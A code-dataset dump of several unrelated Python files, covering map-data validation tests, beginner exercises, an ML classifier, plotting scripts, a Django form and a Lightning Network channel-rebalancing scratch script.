\\\n self._arrow_in_list(arrow_info, RIGHT_ARROW)\n\n if rt_left_value or rt_right_value:\n normal_sum = normal_sum + 1\n if er_left_value or er_right_value:\n exception_sum = exception_sum + 1\n# print normal_sum, exception_sum\n if normal_sum > exception_sum:\n return True\n else:\n return False\n else:\n return False\n\n def _arrow_in_list(self, arrow, arrow_list):\n if len(arrow_list) < 1:\n return False\n for temp_arrow in arrow_list:\n if (arrow & temp_arrow) != 0:\n return True\n return False\n\n\nclass CCheckGuideLaneAllStraight(platform.TestCase.CTestCase):\n def _do(self):\n sqlcmd = \"\"\"\n select count(*)\n from(\n SELECT in_link_id, node_id, array_agg(arrow_info) as arrows\n FROM rdb_guideinfo_lane\n where lane_info > 1\n group by in_link_id,node_id\n ) as a\n where array_upper(arrows,1) > 2 and not (1 <> any(arrows));\n \"\"\"\n self.pg.execute(sqlcmd)\n rows = self.pg.fetchone()\n if rows[0] > 0:\n return False\n else:\n return True\n\n\nclass CCheckGuideStraightLaneSmallOther(platform.TestCase.CTestCase):\n def _do(self):\n self.pg.CreateFunction_ByName(\"get_tow_link_angle\")\n self.pg.CreateFunction_ByName(\"check_guide_lane_straight_dir\")\n sqlcmd = \"\"\"\n select check_guide_lane_straight_dir();\n \"\"\"\n self.pg.execute(sqlcmd)\n rows = self.pg.fetchone()\n if rows[0] == 0:\n return False\n else:\n return True\n","sub_path":"Suntec/Road_Format13IDDN/source/V13/iDDN/AutoCheck/src/check/rdb/rdb_guideinfo_lane.py","file_name":"rdb_guideinfo_lane.py","file_ext":"py","file_size_in_byte":9709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"270846541","text":"# 10-6\n\nnum_1 = input (\"Please enter the first number (int): \")\nnum_2 = input (\"Please enter the second number (int): \")\n\ntry:\n num_1 = int(num_1)\n num_2 = int(num_2)\nexcept ValueError:\n print (\"At least one of your input is invalid number.\")\nelse:\n print(str(num_1) + \" + \" + str(num_2) + \" = \" + str(num_1 + num_1))\n\n\n# 10-10\nfilename = \"alice.txt\"\n\ntry:\n with open(filename) as file_obj:\n contents = file_obj.read()\nexcept FileNotFoundError:\n print (\"File <\" + filename + \"> not found!\")\nelse:\n print(str(contents.lower().count(\"alice\")))\n\n\n","sub_path":"chap10/file04.py","file_name":"file04.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"59101232","text":"import pandas as pd\nimport numpy as np\nfrom scipy import interp\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import roc_curve, auc\nimport matplotlib.pyplot as plt\nfrom sklearn.ensemble import RandomForestClassifier\n\nfile1 = '../../data/FINAL_FEATURE_VECTOR_improved.csv'\nfeatures_all = pd.read_csv(file1)\nprint(features_all.shape)\n\ndisch = features_all.drop('DELTA_PAIN_3WEEKS', axis=1)\ndisch = disch.drop('DELTA_PAIN_8WEEKS', axis=1)\ndisch = disch.drop('CHANGE_DISCHARGE', axis=1)\ndisch = disch.drop('CHANGE_FOLLOWUP_3', axis=1)\ndisch = disch.drop('CHANGE_FOLLOWUP_8', axis=1)\ndisch = disch.drop('DAY_OF_DISCHARGE1', axis=1)\ndisch = disch.drop('FOLLOW_UP_3WEEKS1', axis=1)\ndisch = disch.drop('FOLLOW_UP_8WEEKS1', axis=1)\ngender = {'Male': 0,'Female': 1}\nrace = {'White': 1,'Black': 2,'Hispanic': 3,'Asian': 4,'Other': 5}\nmarital = {'Married': 0,'Single': 1}\nsurgery = {'ORTHOPEDICS': 1,'BREAST': 2,'GENERAL': 3,'BREAST RECONSTRUCTION': 4,'THORACOTOMY': 5,'VASCULAR': 6}\ninsurance = {'Private': 1,'Medicare': 2,'Medicaid': 2,'Other': 2}\nopioid = {'NO': 0,'YES': 1}\noutput = {'DECREASE': 0,'INCREASE': 1}\n\ndisch.GENDER = [gender[item] for item in disch.GENDER]\ndisch.RACE = [race[item] for item in disch.RACE]\ndisch.MARITAL_STATUS = [marital[item] for item in disch.MARITAL_STATUS]\ndisch.SURGERY_TYPE = [surgery[item] for item in disch.SURGERY_TYPE]\ndisch.INSURANCE_TYPE = [insurance[item] for item in disch.INSURANCE_TYPE]\ndisch.OPIOID_TOLERANT = [opioid[item] for item in disch.OPIOID_TOLERANT]\ndisch.DELTA_PAIN_DISCHARGE = [output[item] for item in disch.DELTA_PAIN_DISCHARGE]\n\ndisch1 = disch.dropna(subset=['DELTA_PAIN_DISCHARGE', 'PREOP_PAIN'])\nprint(disch.shape)\nprint(disch1.shape)\nfpr_load = []\ntpr_load = []\nthresholds = []\nfor i in range(10):\n train, test = train_test_split(disch1, test_size=0.2)\n print(train.shape)\n print(test.shape)\n regr = RandomForestClassifier(n_estimators=30, min_samples_split=100, class_weight=\"balanced\")\n X = train.iloc[:,1:65]\n print(X.shape)\n y = train.iloc[:,65]\n print(y.shape)\n regr.fit(X, y)\n X1 = test.iloc[:,1:65]\n y1 = test.iloc[:,65]\n predict_y1 = regr.predict_proba(X1)[:,1]\n false_positive_rate, true_positive_rate, thresholds = roc_curve(y1, predict_y1)\n fpr_load.append(false_positive_rate)\n tpr_load.append(true_positive_rate)\n\nn_folds = len(fpr_load)\ntprs = []\naucs = []\nmean_fpr = np.linspace(0, 1, 100)\nplt.figure(figsize=(10,8))\nfor i in range(n_folds):\n tprs.append(interp(mean_fpr, fpr_load[i], tpr_load[i]))\n tprs[-1][0] = 0.0\n roc_auc = auc(fpr_load[i], tpr_load[i])\n aucs.append(roc_auc)\n plt.plot(fpr_load[i], tpr_load[i], lw=1, alpha=0.3,\n label='ROC fold %d (AUC = %0.2f)' % (i, roc_auc))\n\nplt.plot([0, 1], [0, 1], linestyle='--', lw=2, color='r',\n label='Random prediction', alpha=.8)\n\nmean_tpr = np.mean(tprs, axis=0)\nmean_tpr[-1] = 1.0\nmean_auc = auc(mean_fpr, mean_tpr)\nstd_auc = np.std(aucs)\nplt.plot(mean_fpr, mean_tpr, color='b',\n label=r'Mean ROC (AUC = %0.2f $\\pm$ %0.2f)' % (mean_auc, std_auc),\n lw=2, alpha=.8)\n\nstd_tpr = np.std(tprs, axis=0)\ntprs_upper = np.minimum(mean_tpr + std_tpr, 1)\ntprs_lower = np.maximum(mean_tpr - std_tpr, 0)\nplt.fill_between(mean_fpr, tprs_lower, tprs_upper, color='grey', alpha=.2,\n label=r'$\\pm$ 1 std. dev.')\n\nplt.xlim([-0.05, 1.05])\nplt.ylim([-0.05, 1.05])\nplt.xlabel('False Positive Rate')\nplt.ylabel('True Positive Rate')\n\nplt.legend(loc=\"lower right\")\nplt.show()\n\nfeature_name_aslist = list(X.columns.values)\ndf_elasticnetCoff = pd.DataFrame({'Features':feature_name_aslist, 'Weights':regr.feature_importances_})\nwriter = pd.ExcelWriter('../../data/randomforest/rf-classifier-coeffs1_new.xlsx')\ndf_elasticnetCoff.to_excel(writer,'Sheet1')\nwriter.save()\n","sub_path":"src/models/Random Forest Classifier/random_forest_classifier_discharge_pain.py","file_name":"random_forest_classifier_discharge_pain.py","file_ext":"py","file_size_in_byte":3806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"130789279","text":"def check_pep8(files):\n\n def run_pycodestyle(files, ignored_rules):\n failed = False\n pep8 = subprocess.Popen(((['pycodestyle'] + files) + ['--ignore={rules}'.format(rules=','.join(ignored_rules))]), stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)\n for pipe in (pep8.stdout, pep8.stderr):\n assert (pipe is not None)\n for ln in pipe:\n sys.stdout.write(ln)\n failed = True\n return failed\n failed = False\n ignored_rules = ['E221', 'E226', 'E251', 'E265', 'E266', 'E302', 'E305', 'E402', 'E501', 'E731']\n IGNORE_FILES_PEPE261 = ['api/zulip/__init__.py', 'tools/run-dev.py', 'zerver/lib/bugdown/__init__.py', 'zerver/models.py', 'zerver/tests/test_bugdown.py', 'zerver/tests/test_events.py', 'zerver/tests/test_messages.py', 'zerver/tests/test_narrow.py', 'zerver/tests/test_outgoing_webhook_system.py', 'zerver/tests/test_realm.py', 'zerver/tests/test_signup.py', 'zerver/tests/test_subs.py', 'zerver/tests/test_upload.py', 'zerver/tornado/socket.py', 'zerver/tornado/websocket_client.py', 'zerver/worker/queue_processors.py', 'zilencer/management/commands/populate_db.py', 'zproject/dev_settings.py', 'zproject/prod_settings_template.py', 'zproject/settings.py']\n filtered_files = [fn for fn in files if (fn not in IGNORE_FILES_PEPE261)]\n filtered_files_E261 = [fn for fn in files if (fn in IGNORE_FILES_PEPE261)]\n if (len(files) == 0):\n return False\n if (not (len(filtered_files) == 0)):\n failed = run_pycodestyle(filtered_files, ignored_rules)\n if (not (len(filtered_files_E261) == 0)):\n if (not failed):\n failed = run_pycodestyle(filtered_files_E261, (ignored_rules + ['E261']))\n return failed","sub_path":"Data Set/bug-fixing-5/ae7781dd760555060427b23d48e29b22027d68f3--bug.py","file_name":"ae7781dd760555060427b23d48e29b22027d68f3--bug.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"132533127","text":"from django import forms\nfrom .models import SuperHeroModel\nfrom FieldsWidgetsCWApp.choices import STATUS_CHOICES, SUPERPOWER_CHOICES, ALIGNMENT_CHOICES\n\n\nclass SuperHeroForm(forms.ModelForm):\n class Meta:\n model = SuperHeroModel\n fields = \"__all__\"\n widgets = {\n \"are_you_rich_or_have_superpowers\": forms.Select(choices=STATUS_CHOICES),\n \"if_so_what_superpower\": forms.Select(choices=SUPERPOWER_CHOICES),\n \"what_is_your_alignment\": forms.Select(choices=ALIGNMENT_CHOICES),\n }\n","sub_path":"FieldsWidgetsCWApp/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"226412998","text":"import matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport os\nimport numpy as np\nimport random\nimport torch\nimport glob\nimport torch.nn as nn\nimport torchvision\nfrom scipy.io import loadmat\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nimport sys\n\n#argv should be folder name, e.g. 'cat_mean_frame/'\nif len(sys.argv)>1:\n folder_name=sys.argv[1]\n\npath = folder_name + 'npy/'\n\ncc_nx_array = np.zeros([800,14])\ncc_nnx_array = np.zeros([800,14])\npsnr_nx_array = np.zeros([800,14])\npsnr_nnx_array = np.zeros([800,14])\nfor i in range(14):\n cc_nx_array[:,i]=np.load(path+'cc_nx-{}.npy'.format(i+1))\n cc_nnx_array[:,i]=np.load(path+'cc_nnx-{}.npy'.format(i+1))\n psnr_nx_array[:,i]=np.load(path+'psnr_nx-{}.npy'.format(i+1))\n psnr_nnx_array[:,i]=np.load(path+'psnr_nnx-{}.npy'.format(i+1))\n\nfig1 = plt.figure()\nplt.title('Correlation coefficient')\nplt.xticks()\nplt.xlabel('time frame')\nplt.yticks()\nplt.ylabel('iterations')\ncc_img1 = plt.imshow(cc_nx_array[0:100,:],cmap='magma',aspect='auto')\nplt.clim(0.5,cc_nx_array.max())\nplt.colorbar(cc_img1)\nplt.savefig(folder_name+'cc_nx.png')\nplt.close(fig1)\n\nloc_list = []\nfor i in range(14):\n loc = np.argmax(cc_nnx_array[0:100,i]) #find the number of iteration that gives the biggest cc_nnx value\n loc_list.append(loc)\n\nprint(loc_list)\n\nfig2 = plt.figure()\nplt.title('Correlation coefficient')\nplt.xticks()\nplt.xlabel('time frame')\nplt.yticks()\nplt.ylabel('iterations')\nplt.plot(range(14),loc_list) #this plot the blue curve\ncc_img2 = plt.imshow(cc_nnx_array[0:100,:],cmap='magma',aspect='auto')\nplt.clim(0.5,cc_nnx_array.max())\nplt.colorbar(cc_img2)\nplt.savefig(folder_name+'cc_nnx.png')\nplt.close(fig2)\n\n\nfig3 = plt.figure()\nplt.title('PSNR')\nplt.xticks()\nplt.xlabel('time frame')\nplt.yticks()\nplt.ylabel('iterations')\npsnr_img1 = plt.imshow(psnr_nx_array[0:100,:],aspect='auto',cmap='magma')\nplt.colorbar(psnr_img1)\nplt.savefig(folder_name+'psnr_nx.png')\nplt.close(fig3)\n\nfig4 = plt.figure()\nplt.title('PSNR')\nplt.xticks()\nplt.xlabel('time frame')\nplt.yticks()\nplt.ylabel('iterations')\npsnr_img2 = plt.imshow(psnr_nnx_array[0:100,:],aspect='auto',cmap='magma')\nplt.colorbar(psnr_img2)\nplt.savefig(folder_name+'psnr_nnx.png')\nplt.close(fig4)\n\n","sub_path":"XCAT/Plot/metric_plot100.py","file_name":"metric_plot100.py","file_ext":"py","file_size_in_byte":2232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"171944462","text":"# BSD 3-Clause License\n#\n# Copyright (c) 2017 xxxx\n# All rights reserved.\n# Copyright 2021 Huawei Technologies Co., Ltd\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n#\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# * Neither the name of the copyright holder nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n# ============================================================================\n\nimport torch\n\n@torch.jit.script\ndef slice_helper(x, offset):\n return x[:, -offset: , : ]\n\n@torch.jit.script\ndef slice_helper2(x: torch.Tensor, start: torch.Tensor, end: torch.Tensor):\n start = start.long()\n end = end.long()\n return x[:, start:end]\n\n@torch.jit.script\ndef slice_helper3(x, start):\n return x[:, start:]\n\n@torch.jit.script\ndef get_item(x):\n item = x.detach().item()\n output = torch.tensor(item)\n return output\n\n@torch.jit.script\ndef get_next_cache_start(required_cache_size: torch.Tensor, xs: torch.Tensor):\n next_cache_start = 0\n if required_cache_size < 0:\n next_cache_start = 0\n elif required_cache_size == 0:\n next_cache_start = xs.size(1)\n else:\n if xs.size(1) - required_cache_size < 0:\n next_cache_start = 0\n else:\n next_cache_start = xs.size(1) - required_cache_size\n return torch.tensor(next_cache_start, dtype=torch.int64)\n","sub_path":"ACL_PyTorch/contrib/audio/WeNet/slice_helper.py","file_name":"slice_helper.py","file_ext":"py","file_size_in_byte":2616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"624942900","text":"class Solution(object):\n def increasingTriplet(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: bool\n \"\"\"\n n_len = len(nums)\n if n_len < 3:\n return False\n ptr1, ptr2 = 0, 1\n i = 2\n cur_min_idx = None\n while i < n_len:\n if nums[ptr1] < nums[ptr2] < nums[i]:\n return True\n if cur_min_idx != None and nums[i] > nums[cur_min_idx]:\n if nums[ptr1] >= nums[ptr2] or nums[i] < nums[ptr2]:\n ptr1, ptr2 = cur_min_idx, i\n i += 1\n continue\n if nums[i] < nums[ptr1] and nums[i] < nums[ptr2]:\n if cur_min_idx == None or nums[i] < nums[cur_min_idx]:\n cur_min_idx = i\n i += 1\n continue\n if nums[ptr1] < nums[ptr2]:\n if nums[ptr2] > nums[i] and nums[ptr1] < nums[i]:\n ptr2 = i\n else:\n ptr1, ptr2 = ptr2, i\n i += 1\n return False\n","sub_path":"normal/334_increasing_triplet_subsequence.py","file_name":"334_increasing_triplet_subsequence.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"532481424","text":"\"\"\"\nExceptions are part of the API\n\ncallers need to know what \"exceptions\" to expect, and when.\n\n\"\"\"\nimport sys\n\n\ndef sqrt(x):\n \"\"\"Compute square roots using the method of Heron of Alexandria.\n\n Args:\n x: The number for which the square root is to be computed.\n\n Returns:\n The square root of x.\n\n Raises:\n ValueError: If x is negative\n \"\"\"\n if x < 0:\n raise ValueError(\"Cannot compute square root of a negative number {}\".format(x))\n\n guess = x\n i = 0\n while guess * guess != x and i < 20:\n guess = (guess + x / guess) / 2.0\n i += 1\n return guess\n\n\ndef main():\n try:\n print(sqrt(9))\n print(sqrt(2))\n print(sqrt(-1))\n print(\"This is never printed\")\n except ValueError as e: # ValueError excepted from the sqrt function. And therefore catching it.\n print(e, file=sys.stderr)\n\n print(\"Program execution continues normally here.\")\n\n\nif __name__ == \"__main__\":\n main()\n\n\n\"\"\"Output is clean\n3.0\n1.414213562373095\nCannot compute square root of a negative number -1\nProgram execution continues normally here.\n\"\"\"","sub_path":"pythonIntermediate/e.handling-exceptions/exceptions_api_wellBefore.py","file_name":"exceptions_api_wellBefore.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"132501058","text":"from lnd_rest import *\nimport code\nimport pandas\nimport pyqrcode\n\npandas.set_option(\"display.max_colwidth\", None)\npandas.set_option(\"display.max_rows\", None)\n\nqrdata = getNewAddress()\nprint(f\"Creating code for address: {qrdata}\")\nqr = pyqrcode.create(qrdata)\nprint(qr.terminal(quiet_zone=1))\n\nprint(\n pyqrcode.create(\"\".upper(), version=17, mode=\"alphanumeric\").terminal(quiet_zone=1)\n)\n\n\ndef rebalance_script():\n a = listChannels()\n a = a[a[\"active\"] == True]\n pl = []\n bcount = 0\n while len(a[a[\"local_balance\"] < 500000]) > 0:\n a = listChannels()\n a = a[a[\"active\"] == True]\n taker = a[\"tobalance\"].idxmax()\n giver = a[\"tobalance\"].idxmin()\n oid = a.loc[giver].chan_id\n pk = a.loc[taker].remote_pubkey\n # Divide it down to smaller chunks for cheaper fees\n pay_piece = int(a.loc[taker].tobalance / 3)\n if pay_piece < 75000:\n pay_piece = int(a.loc[taker].tobalance)\n print(f\"Sending {pay_piece} from {a.loc[giver].alias} to {a.loc[taker].alias}!\")\n result = rebalance(pay_piece, oid, pk, 5000, force=True)\n pl.append(result)\n bcount += 1\n print(f\"Rebalanced {bcount} times!\")\n return pl\n\n\ndef inflows():\n a = getForwards(60)\n in_oids = a[\"chan_id_in\"].unique()\n df = pandas.DataFrame()\n for edge in in_oids:\n try:\n df = df.append(getChanPolicy(edge))\n except Exception as e:\n print(f\"Edge Not Found: {e}\")\n df = df.reset_index()\n df = df.drop([\"index\"], axis=1)\n return df[df[\"pubkey\"] != getMyPk()]\n\n\ndef outflows():\n a = getForwards(60)\n out_oids = a[\"chan_id_out\"].unique()\n df = pandas.DataFrame()\n for edge in out_oids:\n try:\n df = df.append(getChanPolicy(edge))\n except Exception as e:\n print(f\"Edge Not Found: {e}\")\n df = df.reset_index()\n df = df.drop([\"index\"], axis=1)\n return df[df[\"pubkey\"] != getMyPk()]\n\n\ndef flowsort():\n c = listChannels()\n fin = inflows()\n fout = outflows()\n in_nodes = set(fin.pubkey)\n out_nodes = set(fout.pubkey)\n routing_nodes = in_nodes.intersection(out_nodes)\n in_nodes = in_nodes - routing_nodes\n out_nodes = out_nodes - routing_nodes\n c[c[\"remote_pubkey\"].isin(list(routing_nodes))]\n return in_nodes, routing_nodes, out_nodes\n\n\ndef findBadNodes():\n a = getForwards()\n forwarding_nodes = set(a.tail(500).chan_id_in).union(set(a.tail(500).chan_id_out))\n all_chan_ids = set(listChannels().chan_id)\n bad_node_ids = all_chan_ids.difference(forwarding_nodes)\n badnodelist = listChannels(all=True).query(\"chan_id.isin(@bad_node_ids)\")\n\n\ndef test1():\n a = getForwards()\n fwd_in = list(a.query(\"dts.str.contains('2020-07-13')\").chan_id_in)\n fwd_out = list(a.query(\"dts.str.contains('2020-07-13')\").chan_id_out)\n print(\"In-Nodes: \")\n listChannels().query(\"chan_id.isin(@fwd_in)\")\n print(\"Out-Nodes: \")\n listChannels().query(\"chan_id.isin(@fwd_out)\")\n\n\n# Delete me\ndepleted = listChannels().query(\n \"local_balance < 400000 and active == True and capacity > 1000000\"\n)\nnum_depleted = depleted.shape[0]\n\nglut = listChannels().query(\n \"remote_balance < 400000 and active == True and capacity > 1000000\"\n)\nnum_glut = glut.shape[0]\n\n# oid =\n# lh =\nrebalance(100000, oid, lh, 8000, force=True)\n\n\ndef rebalancePartners():\n partners = []\n mypk = getMyPK()\n hop1_partners = getNodeChannels(mypk)\n count = 0\n for z in hop1_partners.iterrows():\n hop1_pk = z[1].item()\n hop2_partners = getNodeChannels(hop1_pk)\n for y in hop2_partners.iterrows():\n hop2_pk = y[1].item()\n hop3_partners = getNodeChannels(hop2_pk)\n for x in hop3_partners.iterrows():\n hop3_pk = x[1].item()\n count += 1\n print(f\"Searched {count} nodes\")\n if hop3_pk == mypk:\n partners.append((hop1_pk, hop2_pk, hop3_pk))\n return partners\n\n\nfh_pk = \"031d2bbc75802689312220a017c6b51fa246efc59c7aa9355f6f7395038ffb4d6a\"\nlh_pk = \"02f3069a342ae2883a6f29e275f06f28a56a6ea2e2d96f5888a3266444dcf542b6\"\n\n# disabled == False and\ndef rebalancePartners2():\n partners = []\n mypk = getMyPK()\n fh_pk = \"\"\n hop1_partners = getNodeChannels2(mypk)\n # hop1_partners = hop1_partners.query(\"fee_rate_milli_msat < 15\").head(100)\n count = 0\n lh_pk = \"021c97a90a411ff2b10dc2a8e32de2f29d2fa49d41bfbb52bd416e460db0747d0d\"\n for z in hop1_partners.pubkey.values:\n # print(z)\n hop1_pk = z\n try:\n hop2_partners = getNodeChannels2(hop1_pk)\n hop2_partners = hop2_partners.query(\"fee_rate_milli_msat < 5\").head(100)\n # print(hop2_partners)\n except Exception as e:\n continue\n for y in hop2_partners.pubkey.values:\n try:\n # print(y)\n hop2_pk = y\n hop3_partners = getNodeChannels2(hop2_pk)\n hop3_partners = hop3_partners.query(\"fee_rate_milli_msat < 5\").head(100)\n count += 1\n print(f\"Searched {count} nodes\")\n if mypk in hop3_partners.pubkey.values and hop2_pk == lh_pk:\n print(getAlias(hop3_pk))\n partners.append((hop1_pk, hop2_pk, mypk))\n except Exception as e:\n continue\n for x in hop3_partners.pubkey.values:\n try:\n # print(y)\n hop3_pk = x\n hop4_partners = getNodeChannels2(hop3_pk)\n hop4_partners = hop3_partners.query(\"fee_rate_milli_msat < 5\").head(\n 100\n )\n count += 1\n print(f\"Searched {count} nodes\")\n if mypk in hop4_partners.pubkey.values and hop3_pk == lh_pk:\n print(getAlias(hop3_pk))\n partners.append((hop1_pk, hop2_pk, hop3_pk, mypk))\n except Exception as e:\n continue\n\n #### Rebalance Algorithm recursive\n #### START Find circular routes:\n mypk = getMyPK()\n firsthop_pk = \"03d606331f19b2500f88bc373cc830492736a7d4be6ecc6cc770e0014e94ee0f58\"\n lasthop_pk = \"02f3069a342ae2883a6f29e275f06f28a56a6ea2e2d96f5888a3266444dcf542b6\"\n\n all_routes = []\n route = []\n route.append(firsthop_pk)\n hoplist = getNodeChannels2(firsthop_pk)\n rroute = check_circular(hoplist, lasthop_pk, route)\n\n\ndef check_circular(hoplist, lasthop_pk, route, depth=0):\n depth = depth + 1\n check_filter = hoplist.query(\"pubkey == @lasthop_pk\")\n print(check_filter)\n code.interact(local=locals())\n # Found a circular route\n if not check_filter.empty:\n return route.append(check_filter.pubkey.item())\n # Not a full loop, interate again\n else:\n for i in list(hoplist.pubkey):\n hoplist = getNodeChannels2(i)\n return check_circular(hoplist, lasthop_pk, route, depth)\n\n\n#### END\n\n\n#### Rebalance Algorithm for-loop\n#### START Find circular routes:\nmypk = getMyPK()\nfirsthop_pk = \"03d606331f19b2500f88bc373cc830492736a7d4be6ecc6cc770e0014e94ee0f58\"\nlasthop_pk = \"02f3069a342ae2883a6f29e275f06f28a56a6ea2e2d96f5888a3266444dcf542b6\"\n\nall_routes = []\nroute = []\n# All routes start with the first-hop\nroute.append(firsthop_pk)\n\n\ndef check_circular(hoppk, lasthop_pk, route, depth=0):\n hoplist = getNodeChannels2(hoppk)\n check_filter = hoplist.query(\"pubkey == @lasthop_pk\")\n if not check_filter.empty:\n route.append(check_filter.pubkey.item())\n # Append mypk to end of route\n route.append(mypk)\n return route\n else:\n return None\n\n\nfound_aroute = check_circular(firsthop_pk, lasthop_pk, route)\nif found_aroute != None:\n all_routes.append(found_aroute)\nelse:\n # Didnt find lasthop, search through next nodes channels\n for node in list(hoplist.pubkey):\n found_aroute = check_circular(node, lasthop_pk, [*route, node])\n if found_aroute != None:\n all_routes.append(found_aroute)\n else:\n # Didnt find lasthop, search through next nodes channels\n for node in list(hoplist.pubkey):\n found_aroute = check_circular(firsthop_pk, lasthop_pk, [*route, node])\n\n\n#### END\n\n\nb = pandas.DataFrame(partners)\nb.columns = [\"one\", \"two\", \"three\"]\nb[\"oid\"] = b.one.apply(lambda x: getAlias(x))\nb[\"lh\"] = b.two.apply(lambda x: getAlias(x))\nhops = list(b.iloc[0][[\"one\", \"two\", \"three\"]])\nr = buildRoute(hops, 100000)\ninvoice = addInvoice(100000, \"test\")\npprint(sendRoute(invoice[\"r_hash\"], r))\n\n\ninvoice = addInvoice(balance_amt, \"test\")\n\n\noinv = openInvoices()\noinv.query(\"memo == 'balance'\").sort_values(\"value_msat\")\n\n\nlistChannels(all=True).query(\n \"capacity >= 1000000 and balanced > 0.8 and active == True\"\n)[[\"alias\", \"chan_id\", \"remote_pubkey\", \"balanced\"]]\n\n\nasync def lc():\n ws = await websockets.connect(\n \"wss://10.0.0.111:8080/v2/wallet/address/next?method=POST\",\n ping_timeout=None,\n ping_interval=1,\n ssl=ssl_context,\n extra_headers=headers,\n max_size=1000000000,\n )\n await ws.send(json.dumps({}).encode(\"UTF-8\"))\n hi = await ws.recv()\n print(hi)\n async for message in ws:\n print(\"receiving\")\n try:\n hi = await asyncio.wait_for(ws.recv(), timeout=5)\n hi = json.loads(hi)\n # hi = hi['result']\n pprint(hi)\n except asyncio.TimeoutError:\n print(\"timeout!\")\n except asyncio.CancelledError:\n print(\"cancelled?\")\n\n\nasync def blockstream():\n ws = await websockets.connect(\n \"wss://10.0.0.111:8080/v2/chainnotifier/register/blocks?method=POST\",\n ping_timeout=None,\n ping_interval=20,\n ssl=ssl_context,\n extra_headers=headers,\n max_size=1000000000,\n )\n print(\"waiting\")\n await asyncio.sleep(1)\n print(\"priming\")\n await ws.send(\n json.dumps(\n {\n \"height\": 641549,\n \"hash\": base64.b64encode(\n b\"000000000000000000100a0cdd08a73ebf397c0f0d261d7877c3c55b4bfb4e94\"\n ).decode(),\n }\n ).encode(\"UTF-8\")\n )\n async for message in ws:\n print(\"receiving\")\n try:\n hi = await asyncio.wait_for(ws.recv(), timeout=60)\n hi = json.loads(hi)\n hi = hi[\"result\"]\n await ws.ping()\n pprint(hi)\n except asyncio.TimeoutError:\n print(\"timeout!\")\n except asyncio.CancelledError:\n print(\"cancelled?\")\n\n\ndef async_layer():\n asyncio.run(main())\n\n\n# async thread\n\n\nasync def fetch(client):\n print(\"fetch\")\n async with client.get(\n \"wss://10.0.0.111:8080/v2/router/htlcevents?method=GET\", ssl=ssl_context\n ) as resp:\n print(\"get!\")\n return await resp.text()\n\n\nasync def main():\n async with aiohttp.ClientSession(headers=headers) as client:\n print(\"starting\")\n html = await fetch(client)\n print(html)\n\n\nx = threading.Thread(target=async_layer, daemon=True)\nx.start()\n\n# Get channels and fees\nz = listGetChannelFees()\n# Get low fee destinations with low balance\ny = z.query(\"fee_rate_milli_msat <= 10 and active == True\").sort_values(\n [\"balanced\"], ascending=[1]\n)\n\n\noid = \"694266826229022721\"\nlh = \"022b213281fad5065c66ed53a53198a04b4cb528ce92d76ed0175471b93f1db74f\"\na, b, c, d = rebalance(100000, oid, lh, 4500, force=True)\n\n\ndef multibalance(d):\n global oid\n global lh\n hops = list(d.pub_key)\n for i, row in (\n openInvoices()\n .query(\"memo == 'balance'\")\n .sort_values(\"value_msat\")[::-1]\n .iterrows()\n ):\n try:\n rhash = row[\"r_hash\"]\n balance_amt = int(row[\"value_msat\"] / 1000)\n print(f\"Balancing: {balance_amt}\")\n r = buildRoute(hops, balance_amt)\n pprint(sendRoute(rhash, r))\n listChannels().query(\n \"chan_id.str.contains(@oid) or remote_pubkey.str.contains(@lh)\"\n )\n except Exception as e:\n print(e)\n\n\ndef resetInvoices():\n # Reset buffer of invoices\n oinv = openInvoices()\n need = set({100000, 200000, 300000, 400000, 500000}) - set(\n (\n oinv.query(\"memo == 'balance'\").sort_values(\"value_msat\").value_msat / 1000\n ).astype(int)\n )\n for val in need:\n print(f\"Adding Amount: {val}\")\n addInvoice(val, \"balance\")\n\n\nt = rebalancePartners()\nb = pandas.DataFrame(t)\nb.columns = [\"one\", 